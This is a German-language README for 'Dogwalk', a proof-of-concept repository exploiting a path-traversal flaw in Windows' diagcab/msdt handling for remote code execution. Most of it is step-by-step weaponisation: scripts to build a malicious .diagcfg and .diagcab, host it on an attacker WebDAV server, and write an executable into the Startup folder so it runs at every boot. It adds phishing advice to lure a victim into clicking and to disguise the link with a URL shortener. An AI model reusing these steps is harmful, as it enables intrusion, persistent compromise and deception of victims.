
🐾Dogwalk PoC (nutzt eine diagcab-Datei, um RCE unter Windows zu erzielen)
🚨 Haftungsausschluss 🚨
Das PoC ermöglicht es einem Angreifer, Remote-Code-Injection auf einem Windows-Zielgerät durchzuführen.
Ziel dieses Repos ist es, ein PoC noch benutzerfreundlicher zu machen als das <a href=https://github.com/irsl/microsoft-diagcab-rce-poc>ursprüngliche Repo.
NICHT OHNE VORHERIGE GENEHMIGUNG VERWENDEN!
Angesichts des verursachten Schadens und der Einfachheit der Ausnutzunghoffe ich, dass Microsoft es beheben wird
Update Juli 2022: Microsoft hat die Schwachstelle in msdt noch nicht gepatcht, aber Microsoft Defender kann sie erkennen
Kernkonzept: Path-Traversal-Schwachstelle in Microsofts Diagcab-Technologie (msdt), die zu Remote-Code-Ausführung führen kann.
Die vollständige Sicherheitsmeldung findest du im Blogbeitrag
Die Schwachstelle wurde seit 2 Jahren (von @irsl) gemeldet und ist immer noch nicht behoben!
Das Proof-of-Concept richtet einen WebDAV-Server ein, der eine schädliche .diagcab-Datei hostet, die eine Path-Traversal durchführt, um eine schädliche ausführbare Datei in C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup zu schreiben. Wenn eine ausführbare Datei in diesen Ordner geschrieben wird, wird sie bei jedem Start des Windows-Rechners ausgeführt; dies wird als Boot Logon Autostart Execution bezeichnet.
Im Grunde brauchen wir also:
.diagcab-Datei.diagcab-Datei herunterlädt(💡 verwende den Response-Header Content-type: application/octet-stream, damit der Browser die Datei automatisch herunterlädt, wenn die URL aufgerufen wird)
Wenn du zu faul (oder in Eile) bist, um Schritt für Schritt vorzugehen:
./hurry-dogwalk.sh [WEBDAV_URL] # need docker
# Stop the server
./hurry-dogwalk.sh --clean
Andernfalls ↓↓
.diagcab-Datei.diagcfg sind einfache XML-Dateien, die Verweise auf ein oder mehrere Diagnosepakete enthalten und Metainformationen über diese bereitstellen.diagcab gespeichert.Erstelle zuerst custom.diagcfg:
./build-malicious-diagcfg.sh --url [WEBDAV_URL]
Und erstelle die hotfix895214.diagcab:
cabarc.exe n hotfix895214.diagcab custom.diagcfg
# run it on windows (or with wine). If you do not find carbarc.exe use http://jc.bellamy.free.fr/download/cabarc.exe or http://download.microsoft.com/download/platformsdk/cab/2.0/w98nt42kmexp/en-us/Cabsdk.exe
Verschiebe sie schließlich in das Verzeichnis ./webdav/diagcab-webdav-poc/config
Lege die ausführbare Datei, die du auf den Opfer-Rechner übertragen möchtest, in das Verzeichnis ./webdav/malicious... (Hier verwenden wir den klassischen calc.exe)
...Und starte den Server:
cd ./webdav/diagcab-webdav-poc/
perl diagcab-webdav-poc.pl
Die schädliche .diagcab-Datei ist unter https://[WEBDAV_URL]/config/hotfix895214.diagcab verfügbar. Du musst nun ein Opfer dazu verleiten, auf diesen Link zu klicken.
(💡 du kannst einen URL-Shortener verwenden, um den Link weniger verdächtig erscheinen zu lassen)
🐾🐾
